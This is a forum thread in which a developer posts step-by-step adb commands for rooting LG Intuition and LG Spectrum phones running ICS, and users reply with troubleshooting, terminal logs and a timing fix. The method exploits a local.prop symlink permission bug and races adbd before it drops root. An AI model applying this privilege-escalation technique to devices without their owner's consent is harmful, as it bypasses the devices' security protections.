[ROOT] LG Intuition & LG Spectrum ICS

Search This thread
By:
Advanced…
jcase

jcase

Retired Forum Mod / Senior Recognized Developer
Feb 20, 2010
6,308
15,761
Raleigh NC
Source: http://www.androidpolice.com/2012/0...root-the-lg-intuition-and-lg-spectrum-on-ics/

If you find this useful please follow me (jcase) on twitter ( https://twitter.com/teamandirc/ ).

Here you go, root for both the new LG Intuition and the LG Spectrum running ICS. The vulnerability is a simple permission bug allowing us to setup a symlink to local.prop (yes yet again). While the bug is the same, the procedure is slightly different, so I will have the instructions separate.

With the LG Intuition, they did seem to attempt to mitigate this attack. Not by setting correct permissions, but by dropping adbD to the shell user if it runs as root, even if ro.kernel.qemu=1 is set. They failed, they give us enough time to run one command before dropping the root privileges, in our case a script to root the phone.

LG Spectrum ICS Root (for the leaked ICS rom):
Expect this to be patched in the release rom. Leaked ICS rom has locked bootlaoders, ie no recovery at this point.

Files needed:
su ( http://dl.dropbox.com/u/8699733/lgroot/su )

adb shell

$ rm /data/vpnch/vpnc_starter_lock
$ ln -s /data/local.prop /data/vpnch/vpnc_starter_lock
$ exit

adb reboot

adb wait-for-device shell

$ echo 'ro.kernel.qemu=1' > /data/local.prop
$ exit

adb reboot

adb wait-for-device remount
adb push su /system/xbin/su
adb shell

# chown 0.0 /system/xbin/su
# chmod 06755 /system/xbin/su
# rm /data/local.prop
# rm /data/vpnch/vpnc_starter_lock
# reboot

Once rebooted, install Superuser from the market and enjoy.







LG Intuition Root

Files needed:
su ( http://dl.dropbox.com/u/8699733/lgroot/su )
lgroot.sh ( http://dl.dropbox.com/u/8699733/lgroot/lgroot.sh )

adb push su /data/local/tmp/su
adb push lgroot.sh /data/local/tmp/lgroot.sh

adb shell

$ chmod 777 /data/local/tmp/lgroot.sh
$ rm /data/vpnch/vpnc_starter_lock
$ ln -s /data/local.prop /data/vpnch/vpnc_starter_lock
$ exit

adb reboot

You may have to unplug/replug your phone to get some computers to pick it up again after this reboot.

adb wait-for-device shell

$ echo 'ro.kernel.qemu=1' > /data/local.prop
$ exit

Here is the important part, you will have to execute the next to commands one after the other. We want the second command to be fired off as soon as adbD comes up, before it drops root privileges. This may take some a few minutes, and after the second command is complete you may have to unplug/replug you phone to get your computer to see it again.

adb reboot
adb wait-for-device /data/local/tmp/lgroot.sh

(Here is where you may have to unplug/replug, but only after the second command has ran).

adb wait-for-device shell


$ su
# rm /data/local.prop
# rm /data/vpnch/vpnc_starter_lock
# reboot

Once rebooted, install Superuser from the market and enjoy.
 
Last edited:
  • Like
Reactions: tieuphi and GiantsFan91
LostCauseSPM

LostCauseSPM

Member
Jan 29, 2012
9
0
Thanks!

Dude, it has been killing me not having root since I managed to get the leaked ICS installed. But I tried this, and just wasn't having any luck. I tried to make a .bat file for it, no go. So i tried inputting it line by line and i keep getting hung up at the $ echo 'ro.kernel.qemu=1' part. Just wondering if anyone else is having this problem.
Also, since yesterday whenever I check for a software update, I'm getting an "error occurred during download". I was wondering if I would even be able to get the final ICS OTA when it finally is available.
Thanks again jcase!
 
jcase

jcase

Retired Forum Mod / Senior Recognized Developer
Feb 20, 2010
6,308
15,761
Raleigh NC
LostCauseSPM said:
Dude, it has been killing me not having root since I managed to get the leaked ICS installed. But I tried this, and just wasn't having any luck. I tried to make a .bat file for it, no go. So i tried inputting it line by line and i keep getting hung up at the $ echo 'ro.kernel.qemu=1' part. Just wondering if anyone else is having this problem.
Also, since yesterday whenever I check for a software update, I'm getting an "error occurred during download". I was wondering if I would even be able to get the final ICS OTA when it finally is available.
Thanks again jcase!
Click to expand...
Click to collapse

Which specific ICS version do you have, I had a couple different leaks to work with.
 
lahegry

lahegry

Senior Member
Apr 8, 2010
642
223
live oak
jcase said:
Source: http://www.androidpolice.com/2012/0...root-the-lg-intuition-and-lg-spectrum-on-ics/


LG Intuition Root

Files needed:
su ( http://dl.dropbox.com/u/8699733/lgroot/su )
lgroot.sh ( http://dl.dropbox.com/u/8699733/lgroot/lgroot.sh )

adb push su /data/local/tmp/su
adb push lgroot.sh /data/local/tmp/lgroot.sh

adb shell

$ chmod 777 /data/local/tmp/lgroot.sh
$ rm /data/vpnch/vpnc_starter_lock
$ ln -s /data/local.prop /data/vpnch/vpnc_starter_lock
$ exit

adb reboot

You may have to unplug/replug your phone to get some computers to pick it up again after this reboot.

adb wait-for-device shell

$ echo ‘ro.kernel.qemu=1’ > /data/local.prop
$ exit

Here is the important part, you will have to execute the next to commands one after the other. We want the second command to be fired off as soon as adbD comes up, before it drops root privileges. This may take some a few minutes, and after the second command is complete you may have to unplug/replug you phone to get your computer to see it again.

adb reboot
adb wait-for-device /data/local/tmp/lgroot.sh

(Here is where you may have to unplug/replug, but only after the second command has ran).

adb wait-for-device shell


$ su
# rm /data/local.prop
# rm /data/vpnch/vpnc_starter_lock
# reboot
:crying:
Once rebooted, install Superuser from the market and enjoy.
Click to expand...
Click to collapse
i tried but as soon as i entered adb shell it kick me off and haven't been able to try since
 
LostCauseSPM

LostCauseSPM

Member
Jan 29, 2012
9
0
jcase said:
Which specific ICS version do you have, I had a couple different leaks to work with.
Click to expand...
Click to collapse

Ive got the spectrum, btw. Still trying to make a nice, clean, automated .bat, but it keeps failing now at the remount command.

---------- Post added at 07:37 PM ---------- Previous post was at 07:24 PM ----------

And now is saying "rm failed for /data/vpnch..."
When the remount fails, I get a "remount failed: operation not permitted" message.
Hope this is useful to you.
 
jcase

jcase

Retired Forum Mod / Senior Recognized Developer
Feb 20, 2010
6,308
15,761
Raleigh NC
LostCauseSPM said:
Ive got the spectrum, btw. Still trying to make a nice, clean, automated .bat, but it keeps failing now at the remount command.

---------- Post added at 07:37 PM ---------- Previous post was at 07:24 PM ----------

And now is saying "rm failed for /data/vpnch..."
When the remount fails, I get a "remount failed: operation not permitted" message.
Hope this is useful to you.
Click to expand...
Click to collapse

add jcase@cunninglogic.com to gltak and hit me up.
 
LostCauseSPM

LostCauseSPM

Member
Jan 29, 2012
9
0
so this is just I've come up with tonight, the exploit still fails line by line, so I made a batch file just for that command, and I think I may be misunderstanding that "adb mount - o" command you recomended.
Wow, this chrome is NOT liking this txt box, keeps jumping backwards for some reason. C'mon Google...
 
arnshrty

arnshrty

Member
Apr 13, 2009
48
10
43
Weatherford
I've got the intuition and here is what I'm coming up with using cmd prompt in windows:

C:\android-sdk\platform-tools>adb push su /data/local/tmp/su
2642 KB/s (380532 bytes in 0.140s)

C:\android-sdk\platform-tools>adb push lgroot.sh /data/local/tmp/lgroot.sh
10 KB/s (164 bytes in 0.015s)

C:\android-sdk\platform-tools>adb shell
shell@android:/ $ chmod 777 /data/local/tmp/lgroot.sh
chmod 777 /data/local/tmp/lgroot.sh
shell@android:/ $ rm /data/vpnch/vpnc_starter_lock
rm /data/vpnch/vpnc_starter_lock
shell@android:/ $ ln -s /data/local.prop /data/vpnch/vpnc_starter_lock
ln -s /data/local.prop /data/vpnch/vpnc_starter_lock
shell@android:/ $ exit
exit

C:\android-sdk\platform-tools>adb reboot

C:\android-sdk\platform-tools>adb wait-for-device shell
shell@android:/ $ echo `ro.kernel.qemu=1' > /data/local.prop
echo `ro.kernel.qemu=1' > /data/local.prop
> exit
exit
> adb reboot
adb reboot
> adb wait-for-device /data/local/tmp/lgroot.sh
adb wait-for-device /data/local/tmp/lgroot.sh
> adb wait-for-device shell
adb wait-for-device shell
>

I believe I see where the mistake is, but don't know how to fix it.

---------- Post added 30th September 2012 at 12:02 AM ---------- Previous post was 29th September 2012 at 11:57 PM ----------

actually I don't see my mistake and I should be doing all this in PTP mode correct?
 
jcase

jcase

Retired Forum Mod / Senior Recognized Developer
Feb 20, 2010
6,308
15,761
Raleigh NC
Try now, something was altering my post

arnshrty said:
I've got the intuition and here is what I'm coming up with using cmd prompt in windows:

C:\android-sdk\platform-tools>adb push su /data/local/tmp/su
2642 KB/s (380532 bytes in 0.140s)

C:\android-sdk\platform-tools>adb push lgroot.sh /data/local/tmp/lgroot.sh
10 KB/s (164 bytes in 0.015s)

C:\android-sdk\platform-tools>adb shell
shell@android:/ $ chmod 777 /data/local/tmp/lgroot.sh
chmod 777 /data/local/tmp/lgroot.sh
shell@android:/ $ rm /data/vpnch/vpnc_starter_lock
rm /data/vpnch/vpnc_starter_lock
shell@android:/ $ ln -s /data/local.prop /data/vpnch/vpnc_starter_lock
ln -s /data/local.prop /data/vpnch/vpnc_starter_lock
shell@android:/ $ exit
exit

C:\android-sdk\platform-tools>adb reboot

C:\android-sdk\platform-tools>adb wait-for-device shell
shell@android:/ $ echo `ro.kernel.qemu=1' > /data/local.prop
echo `ro.kernel.qemu=1' > /data/local.prop
> exit
exit
> adb reboot
adb reboot
> adb wait-for-device /data/local/tmp/lgroot.sh
adb wait-for-device /data/local/tmp/lgroot.sh
> adb wait-for-device shell
adb wait-for-device shell
>

I believe I see where the mistake is, but don't know how to fix it.

---------- Post added 30th September 2012 at 12:02 AM ---------- Previous post was 29th September 2012 at 11:57 PM ----------

actually I don't see my mistake and I should be doing all this in PTP mode correct?
Click to expand...
Click to collapse
 
K

krapman

New member
Jan 12, 2011
4
1
Correction needed for Intuition

First of all, thank you!!!

For Intuition, where the 'important part' is, the second command returns an error.
I was able to succeed by running
adb reboot
adb wait-for-device shell
then wait for the # to appear, and quickly paste and execute:
/data/local/tmp/lgroot.sh

took a few tries, but I am rooted! :laugh:
 
D

davieslacker

Member
Feb 3, 2010
22
4
krapman said:
First of all, thank you!!!

For Intuition, where the 'important part' is, the second command returns an error.
I was able to succeed by running
adb reboot
adb wait-for-device shell
then wait for the # to appear, and quickly paste and execute:
/data/local/tmp/lgroot.sh

took a few tries, but I am rooted! :laugh:
Click to expand...
Click to collapse

Just wondering how you guys like this device? I was just debating on switching to verizon and this device stands out as the most interesting to me... so I had to look here to see if anybody rooted it.

Anybody try any different roms? or think there may be a Jelly Bean update for it?
 
pouxonu

pouxonu

Senior Member
Aug 29, 2010
156
8
/system/bin/sh su not found


any help with this was having an issue with the echo command but got past that but now it's giving me this error
 
Last edited:
D

dedrics

Senior Member
Dec 20, 2009
69
1
davieslacker said:
Just wondering how you guys like this device? I was just debating on switching to verizon and this device stands out as the most interesting to me... so I had to look here to see if anybody rooted it.

Anybody try any different roms? or think there may be a Jelly Bean update for it?
Click to expand...
Click to collapse

It's an amazing device I love it and im rooted. used the steps above and it worked. I am sure it will get jelly bean love eventually. No roms yet. But LG added a lot of customization to the device form what developers usually add as mods.
 
C

chavist

Senior Member
Jul 23, 2007
545
72
Will there be a single click method for root on the intuition. I can't seem to get this method to work
 
LostCauseSPM

LostCauseSPM

Member
Jan 29, 2012
9
0
Exploit still works on the final version of ICS for the LG Spectrum

Just updated my phone. Couldn't wait for the OTA rollout, updated via the Verizon Wireless Update Util on my comp. Root worked no problem. Thanks again Jcase!
 
You must log in or register to reply here.

Similar threads

Chainfire
  • Locked
[CENTRAL] CF-Auto-Root
Replies
2K
Views
3M
Chainfire
Chainfire
B
[UTIL][WIN][MT65xx] MTK Droid Root & Tools | MediaTek Android Smartphone
Replies
2K
Views
3M
A
allyalla
Chainfire
[ROOT EXPLOIT+PATCH][2012.12.19] ExynosAbuse APK v1.40
Replies
1K
Views
2M
D
djanielle
Snoop05
[OFFICIAL][TOOL][WINDOWS] ADB, Fastboot and Drivers - 15 seconds ADB Installer v1.4.3
Replies
2K
Views
7M
abdulkareem786
abdulkareem786
C
[TOOL/ROOT][WIN] BlueStacks MultiTool v1.21r1 (Auto Rooter, Xposed, De-bloater, etc)
Replies
438
Views
1M
giggock
giggock

Top Liked Posts

24 Hours All time
  • There are no posts matching your filters.
  • 2
    jcase
    jcase
    Source: http://www.androidpolice.com/2012/0...root-the-lg-intuition-and-lg-spectrum-on-ics/

    If you find this useful please follow me (jcase) on twitter ( https://twitter.com/teamandirc/ ).

    Here you go, root for both the new LG Intuition and the LG Spectrum running ICS. The vulnerability is a simple permission bug allowing us to setup a symlink to local.prop (yes yet again). While the bug is the same, the procedure is slightly different, so I will have the instructions separate.

    With the LG Intuition, they did seem to attempt to mitigate this attack. Not by setting correct permissions, but by dropping adbD to the shell user if it runs as root, even if ro.kernel.qemu=1 is set. They failed, they give us enough time to run one command before dropping the root privileges, in our case a script to root the phone.

    LG Spectrum ICS Root (for the leaked ICS rom):
    Expect this to be patched in the release rom. Leaked ICS rom has locked bootlaoders, ie no recovery at this point.

    Files needed:
    su ( http://dl.dropbox.com/u/8699733/lgroot/su )

    adb shell

    $ rm /data/vpnch/vpnc_starter_lock
    $ ln -s /data/local.prop /data/vpnch/vpnc_starter_lock
    $ exit

    adb reboot

    adb wait-for-device shell

    $ echo 'ro.kernel.qemu=1' > /data/local.prop
    $ exit

    adb reboot

    adb wait-for-device remount
    adb push su /system/xbin/su
    adb shell

    # chown 0.0 /system/xbin/su
    # chmod 06755 /system/xbin/su
    # rm /data/local.prop
    # rm /data/vpnch/vpnc_starter_lock
    # reboot

    Once rebooted, install Superuser from the market and enjoy.







    LG Intuition Root

    Files needed:
    su ( http://dl.dropbox.com/u/8699733/lgroot/su )
    lgroot.sh ( http://dl.dropbox.com/u/8699733/lgroot/lgroot.sh )

    adb push su /data/local/tmp/su
    adb push lgroot.sh /data/local/tmp/lgroot.sh

    adb shell

    $ chmod 777 /data/local/tmp/lgroot.sh
    $ rm /data/vpnch/vpnc_starter_lock
    $ ln -s /data/local.prop /data/vpnch/vpnc_starter_lock
    $ exit

    adb reboot

    You may have to unplug/replug your phone to get some computers to pick it up again after this reboot.

    adb wait-for-device shell

    $ echo 'ro.kernel.qemu=1' > /data/local.prop
    $ exit

    Here is the important part, you will have to execute the next to commands one after the other. We want the second command to be fired off as soon as adbD comes up, before it drops root privileges. This may take some a few minutes, and after the second command is complete you may have to unplug/replug you phone to get your computer to see it again.

    adb reboot
    adb wait-for-device /data/local/tmp/lgroot.sh

    (Here is where you may have to unplug/replug, but only after the second command has ran).

    adb wait-for-device shell


    $ su
    # rm /data/local.prop
    # rm /data/vpnch/vpnc_starter_lock
    # reboot

    Once rebooted, install Superuser from the market and enjoy.
    View
    1
    N
    noezzi
    https://dl.dropbox.com/u/54418871/Intuition Dump.7z

    Lg Intuition system dump. I'm not sure if this is the system img that you need or not. This came from the user arnshrty here at xda
    Sent from my VS950 4G using xda app-developers app
    View
    1
    migui0401
    migui0401
    Fast question!

    If I format my phone, can I just install superuser again and that would be all or must follow this steps again?

    ---------- Post added at 09:28 PM ---------- Previous post was at 09:24 PM ----------
    afbcamaro said:
    I found the factory cab file for the LG Intuition, had to authenticate against the website and fool it to check as a device requesting an update for it to give up the location of the file since you can not browse direct.
    Maybe this will help with further development since we should now be able to restore to factory incase of a mishap.

    Link to download the file from LG servers (get it before it disappears) FILE is around 837mbs

    http://csmgdl.lgmobile.com/swdata/WEBSW/LGVS950/AVRZBK/VS95010B_00/VS95010B_00.S10B_00.P58015.R5.cab
    Click to expand...
    Click to collapse

    Man, can you tell how to flash this CAB file? I'm really new to this device and wanna update it to jelly bean, hope your fast answer :fingers-crossed:
    View

New posts